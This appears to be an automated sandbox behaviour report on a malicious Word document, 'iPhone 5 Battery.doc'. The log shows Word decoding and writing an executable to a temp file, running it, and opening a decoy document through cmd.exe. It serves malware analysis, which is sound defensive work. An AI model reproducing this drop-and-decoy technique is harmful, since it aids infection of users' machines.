15:20:05 2 7 2
15:20:06 3 9 3
15:20:07 3 9 3
15:20:08 5 13 5
15:20:09 19 27 19
15:20:10 21 29 21
15:20:11 138 79 138
15:20:13 147 68 147
15:20:14 208 84 208
15:20:15 217 71 217
15:20:16 295 79 295
15:20:17 407 85 407
15:20:18 443 86 443
15:20:19 498 77 498
15:20:20 537 76 537

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Windows UI Activites
Window Created
Window name Class name HWND Completion Count Source Address Symbol
OpusApp OpusApp 5012E success 1 30029D25 CreateWindowExW
_WwC _WwC 40134 success 1 30054A32 CreateWindowExA
_WwF _WwF 90058 success 1 30054A32 CreateWindowExA
_WwB _WwB 80040 success 1 30029D25 CreateWindowExW
_WwB _WwB 5012C success 1 30029D25 CreateWindowExW
_WwG _WwG 50106 success 1 30029D25 CreateWindowExW
6.0.2600.6028!ScrollBar SCROLLBAR 400EC success 1 30054A32 CreateWindowExA
_WwC _WwC 40120 success 1 30054A32 CreateWindowExA
6.0.2600.6028!ScrollBar SCROLLBAR 400E4 success 1 30054A32 CreateWindowExA
_WwC _WwC 400DA success 1 30054A32 CreateWindowExA
_WwC _WwC 500DC success 1 30054A32 CreateWindowExA
_WwC _WwC 400D6 success 1 30054A32 CreateWindowExA
OpusApp OpusApp 9014E success 1 30029D25 CreateWindowExW
_WwC _WwC 400D8 success 1 30054A32 CreateWindowExA
_WwF _WwF 7013C success 1 30054A32 CreateWindowExA
_WwB _WwB 400F2 success 1 30029D25 CreateWindowExW
_WwG _WwG 50124 success 1 30029D25 CreateWindowExW
6.0.2600.6028!ScrollBar SCROLLBAR 900FE success 1 30054A32 CreateWindowExA
_WwC _WwC 400EA success 1 30054A32 CreateWindowExA
6.0.2600.6028!ScrollBar SCROLLBAR 90152 success 1 30054A32 CreateWindowExA
_WwC _WwC 700FC success 1 30054A32 CreateWindowExA
_WwC _WwC 60112 success 1 30054A32 CreateWindowExA
Window UIs Enumerated
Window name Class name HWND of window Completion Count Source Address Symbol
NULL MSOBALLOON 0 error 1 30063D12 FindWindowA
NULL MsoHelp10 0 error 1 30063D27 FindWindowA
NULL AgentAnim 0 error 1 30063D40 FindWindowA
HWND Completion Count Source Address Symbol
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
Information about Foreground Window Queried
HWND Completion Count Source Address Symbol
1008C success 1 300037BB NtUserGetForegroundWindow
5012E success 9 30063CEF NtUserGetForegroundWindow
Window UI Shown
HWND Command Completion Count Source Address Symbol
40134 show normal error 1 3005545D NtUserShowWindow
5012E show maximized error 1 3002CCA5 NtUserShowWindow
40134 show normal success 5 3005545D NtUserShowWindow
400EC show normal error 1 300747CC NtUserShowWindow
400E4 show normal error 1 300747CC NtUserShowWindow
400DE show normal error 1 300747CC NtUserShowWindow
40128 show normal error 1 300747CC NtUserShowWindow
500DC show normal error 1 300747CC NtUserShowWindow
400D6 show normal error 1 300747CC NtUserShowWindow
400EC show normal success 3 300747CC NtUserShowWindow
400E4 show normal success 3 300747CC NtUserShowWindow
400DE show normal success 3 300747CC NtUserShowWindow
40128 show normal success 3 300747CC NtUserShowWindow
500DC show normal success 3 300747CC NtUserShowWindow
400D6 show normal success 3 300747CC NtUserShowWindow
5012C show normal error 1 3006A9F5 NtUserShowWindow
50106 show normal error 1 30074BAC NtUserShowWindow
500DC show success 1 30074BC1 NtUserShowWindow
400D6 show success 1 30074BD6 NtUserShowWindow
900FE show normal error 1 300747CC NtUserShowWindow
90152 show normal error 1 300747CC NtUserShowWindow
9013E show normal error 1 300747CC NtUserShowWindow
500F8 show normal error 1 300747CC NtUserShowWindow
60112 show normal error 1 300747CC NtUserShowWindow
900FE show normal success 2 300747CC NtUserShowWindow
90152 show normal success 2 300747CC NtUserShowWindow
9013E show normal success 2 300747CC NtUserShowWindow
500F8 show normal success 2 300747CC NtUserShowWindow
60112 show normal success 2 300747CC NtUserShowWindow
50124 show normal error 1 30074BAC NtUserShowWindow
60112 show success 1 30074BC1 NtUserShowWindow
400D8 show normal error 1 3005545D NtUserShowWindow
400F2 hide error 1 30294A11 NtUserShowWindow
90058 hide success 1 3024E018 NtUserShowWindow
90058 show error 1 30250866 NtUserShowWindow
Window UI Placement Queried
HWND Command Completion Count Source Address Symbol
5012E show maximized success 2 3006ADB8 NtUserGetWindowPlacement
Message Posted to Windows UI
HWND Message LParam WParam Completion Count Source Address Symbol
5012E 45F 0 0 success 1 30003B2E PostMessageA
50136 DDE_ACK 524352 55447496 success 1 3067D00E PostMessageA
50136 DDE_ACK 524352 3221864481 success 1 3067B376 SendMessageA
TID Message LParam WParam Completion Count Source Address Symbol
Window UIs Hook Set
Module Thread id Hook code Completion Count Source Address Symbol
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 1768 FFFFFFFF success 1 30007EF6 SetWindowsHookExW

Process Token Activites
Status Privilege Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Memory attributes changed PID: 1160 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B81000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 614924961
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion Name: CommonFilesDir success or wait 614925676
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12259328 Protection: execute Mapped to pid: own pid success or wait 614927266
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12304384 Protection: read write Mapped to pid: own pid success or wait 614929938
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 614969924
Foreground Window Got HWND: 1008C success 615140927
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615180950
Process information queried PID: 1160 Info Class: VmCounters success or wait 615181155
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615221478
Process information queried PID: 1160 Info Class: VmCounters success or wait 615221691
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A30000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 615276389
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 615280109
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 615284542
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A30000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 615293274
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 615296119
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 615298353
Window created Window Name: OpusApp Class Name: OpusApp HWND: 5012E success 615334574
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 615387927
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: query and write and read Type: commit Baseaddress: A90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 615388162
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615403324
Process information queried PID: 1160 Info Class: VmCounters success or wait 615403527
Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1768 Hook ID: FFFFFFFF success 615503530
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615682534
Process information queried PID: 1160 Info Class: VmCounters success or wait 615682754
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615704360
Process information queried PID: 1160 Info Class: VmCounters success or wait 615704571
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot Offset: unknown Length: 54 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 615715203
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot Offset: unknown Length: 108 Value: 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 615716383
File created Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: null success or wait 615744728
File other op Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word New path: Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: hidden and archive and temporary and sparse file success or wait 615748785
Window created Window Name: _WwC Class Name: _WwC HWND: 40134 success 615761522
Window shown HWND: 40134 CMD: show normal error 615762195
Window created Window Name: _WwF Class Name: _WwF HWND: 90058 success 616180241
Window shown HWND: 5012E CMD: show maximized error 616203283
Foreground Window Got HWND: 5012E success 616242077
Windows found Window Name: NULL Class Name: MSOBALLOON HWND: 0 error 616242285
Windows found Window Name: NULL Class Name: MsoHelp10 HWND: 0 error 616242498
Windows found Window Name: NULL Class Name: AgentAnim HWND: 0 error 616242706
Foreground Window Got HWND: 5012E success 616308358
Foreground Window Got HWND: 5012E success 616325024
Foreground Window Got HWND: 5012E success 616351306
Window shown HWND: 40134 CMD: show normal success 616446590
Window shown HWND: 40134 CMD: show normal success 616455795
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 616491092
Process information queried PID: 1160 Info Class: VmCounters success or wait 616491291
Message posted HWND: 5012E Message: 45F WParam: 0 LParam: 0 success 619554796
Foreground Window Got HWND: 5012E success 619555353
Window created Window Name: _WwB Class Name: _WwB HWND: 80040 success 619573385
Message sent HWND: 50136 Message: DDE_ACK WParam: 524352 LParam: 3221864481 success 619574288
Foreground Window Got HWND: 5012E success 619793558
Foreground Window Got HWND: 5012E success 619793750
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 619974629
Process information queried PID: 1160 Info Class: VmCounters success or wait 619974841
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 619990816
Process information queried PID: 1160 Info Class: VmCounters success or wait 619991028
File write Path: C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 619999738
File write Path: C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 40 00 08 00 36 01 05 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1A 00 00 00 success or wait 620000901
Window placement got HWND: 5012E CMD: show maximized success 626539024
Window created Window Name: _WwB Class Name: _WwB HWND: 5012C success 626541312
Foreground Window Got HWND: 5012E success 626557465
Window created Window Name: _WwG Class Name: _WwG HWND: 50106 success 626558602
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 400EC success 626561968
Window created Window Name: _WwC Class Name: _WwC HWND: 40120 success 626563378
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 400E4 success 626592832
Window created Window Name: _WwC Class Name: _WwC HWND: 400DA success 626616986
Window created Window Name: _WwC Class Name: _WwC HWND: 500DC success 626617515
Window created Window Name: _WwC Class Name: _WwC HWND: 400D6 success 626618331
Window shown HWND: 400EC CMD: show normal error 626644839
Window shown HWND: 400E4 CMD: show normal error 626645010
Window shown HWND: 400DE CMD: show normal error 626645173
Window shown HWND: 40128 CMD: show normal error 626645728
Window shown HWND: 500DC CMD: show normal error 626646364
Window shown HWND: 400D6 CMD: show normal error 626646527
Window shown HWND: 400EC CMD: show normal success 626659203
Window shown HWND: 400E4 CMD: show normal success 626659362
Window shown HWND: 400DE CMD: show normal success 626659518
Window shown HWND: 40128 CMD: show normal success 626660319
Window shown HWND: 500DC CMD: show normal success 626660835
Window shown HWND: 400D6 CMD: show normal success 626660991
Window shown HWND: 400EC CMD: show normal success 626662701
Window shown HWND: 400E4 CMD: show normal success 626662856
Window shown HWND: 400DE CMD: show normal success 626663012
Window shown HWND: 40128 CMD: show normal success 626663392
Window shown HWND: 500DC CMD: show normal success 626663731
Window shown HWND: 400D6 CMD: show normal success 626663887
Window shown HWND: 40134 CMD: show normal success 626664059
Window shown HWND: 5012C CMD: show normal error 626664216
Window shown HWND: 50106 CMD: show normal error 626673791
Window shown HWND: 500DC CMD: show success 626674518
Window shown HWND: 400D6 CMD: show success 626674676
Window shown HWND: 40134 CMD: show normal success 626675495
Window shown HWND: 400EC CMD: show normal success 626675652
Window shown HWND: 400E4 CMD: show normal success 626677700
Window shown HWND: 400DE CMD: show normal success 626679047
Window shown HWND: 40128 CMD: show normal success 626679898
Window shown HWND: 500DC CMD: show normal success 626680515
Window shown HWND: 400D6 CMD: show normal success 626680671
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA Name: Vbe6DllPath success or wait 627146312
Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL Access: write and read and execute Type: commit Baseaddress: 28E0000 Size: 2588672 Protection: execute Mapped to pid: own pid success or wait 627148197
Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL Access: query and write and read and execute Type: image Baseaddress: 65000000 Size: 2588672 Protection: read write Mapped to pid: own pid success or wait 627150840
Window placement got HWND: 5012E CMD: show maximized success 627266739
Window created Window Name: OpusApp Class Name: OpusApp HWND: 9014E success 627267020
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 627303167
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 627307144
Window created Window Name: _WwC Class Name: _WwC HWND: 400D8 success 627324436
Window created Window Name: _WwF Class Name: _WwF HWND: 7013C success 627324986
Window created Window Name: _WwB Class Name: _WwB HWND: 400F2 success 627328828
Window created Window Name: _WwG Class Name: _WwG HWND: 50124 success 627330095
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 900FE success 627333481
Window created Window Name: _WwC Class Name: _WwC HWND: 400EA success 627334233
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 90152 success 627361306
Window created Window Name: _WwC Class Name: _WwC HWND: 700FC success 627388434
Window created Window Name: _WwC Class Name: _WwC HWND: 60112 success 627388949
Window shown HWND: 900FE CMD: show normal error 627392790
Window shown HWND: 90152 CMD: show normal error 627392958
Window shown HWND: 9013E CMD: show normal error 627393118
Window shown HWND: 500F8 CMD: show normal error 627394081
Window shown HWND: 60112 CMD: show normal error 627394744
Window shown HWND: 900FE CMD: show normal success 627397726
Window shown HWND: 90152 CMD: show normal success 627397881
Window shown HWND: 9013E CMD: show normal success 627398034
Window shown HWND: 500F8 CMD: show normal success 627398420
Window shown HWND: 60112 CMD: show normal success 627398764
Window shown HWND: 40134 CMD: show normal success 627398942
Window shown HWND: 50124 CMD: show normal error 627399172
Window shown HWND: 60112 CMD: show success 627399338
Window shown HWND: 400D8 CMD: show normal error 627401081
Window shown HWND: 900FE CMD: show normal success 627401251
Window shown HWND: 90152 CMD: show normal success 627401408
Window shown HWND: 9013E CMD: show normal success 627401563
Window shown HWND: 500F8 CMD: show normal success 627401982
Window shown HWND: 60112 CMD: show normal success 627402370
Window shown HWND: 400F2 CMD: hide error 627402550
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 627414422
Process information queried PID: 1160 Info Class: VmCounters success or wait 627414628
Window shown HWND: 90058 CMD: hide success 627801189
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~WRD0002.doc Offset: unknown Length: 581 Value: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 634989114
Window shown HWND: 90058 CMD: show error 635066230
Message posted HWND: 50136 Message: DDE_ACK WParam: 524352 LParam: 55447496 success 635130760
Foreground Window Got HWND: 5012E success 635599049
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 669475883
File read Path: C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc Offset: unknown Length: 90112 Value: C9 DF 16 87 9B 99 9A 9B 98 9D 9E 9F 6F 6E 92 93 2C 95 96 97 E8 E9 EA EB AC ED EE EF E0 E1 E2 E3 E4 E5 E6 E7 F8 F9 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 CA CB CC CD CE CF 38 C1 C2 C3 CA DA 7C C9 D8 6D D3 16 FD 65 DF 93 1D F0 86 BB BD A6 F6 A7 5A 46 4D 59 4D 40 0E 4C 41 4F 4C 4C 50 05 44 42 success or wait 669487744
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Offset: unknown Length: 90112 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 669610398
Process created PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Cmdline: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Createflags: none success or wait 670178841
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 671090526
File read Path: C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc Offset: unknown Length: 21504 Value: 32 2C F5 05 47 56 E2 18 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 F4 CB CF CD 30 30 C9 C1 C4 C3 C4 C5 C6 C7 D8 D9 DA DB DC DD DF DF D0 D1 F7 D3 D4 D5 D6 D7 28 29 2A 3B 2C 2D 09 2F 20 21 23 23 24 25 D8 D8 C7 C6 3A 3B 3C 3D 1A 3F 30 31 CD CC CB CA C9 C8 F7 F6 F5 F4 F3 F2 F1 F0 FF FE FD FC FB FA success or wait 671097579
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc Offset: unknown Length: 21504 Value: D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 25 00 00 00 00 00 00 00 00 10 00 00 27 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 24 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 671126430
Process created PID: 1096 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd.exe /c iPhone 5.doc Createflags: none success or wait 671188387

Analysis File: svchost.exe PID: 1832 Parent PID: 624

General
Start time: 15:20:05
Start date: 24/07/2012
Path: C:\WINDOWS\system32\svchost.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18

File Activites
File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 630000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 630000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 630000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\wiaservc.dll write and read and execute commit 670000 335872 own pid execute success or wait 1
C:\WINDOWS\system32\wiaservc.dll query and write and read and execute image 75AA0000 348160 own pid read write success or wait 1
\KnownDlls\CFGMGR32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
\KnownDlls\setupapi.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\mscms.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\mscms.dll query and write and read and execute image 73B30000 86016 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 680000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 680000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 680000 2904064 own pid read write conflicting addresses 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\WINTRUST.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\wintrust.dll query and write and read and execute image 76C30000 188416 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\IMAGEHLP.dll write and read and execute unknown 76C90000 163840 own pid read write success or wait 1
C:\WINDOWS\system32\actxprxy.dll write and read and execute commit B20000 98304 own pid execute success or wait 1
C:\WINDOWS\system32\actxprxy.dll query and write and read and execute image 71D40000 110592 own pid read write success or wait 1
C:\WINDOWS\system32\sti.dll write and read and execute commit B60000 69632 own pid execute success or wait 1
C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1

Registry Activites
Key Path Completion Count Source Address Symbol
Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Path Name Completion Count Source Address Symbol

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
PID Process info class Completion Count Source Address Symbol

Thread Activites
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol
TID Delay Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
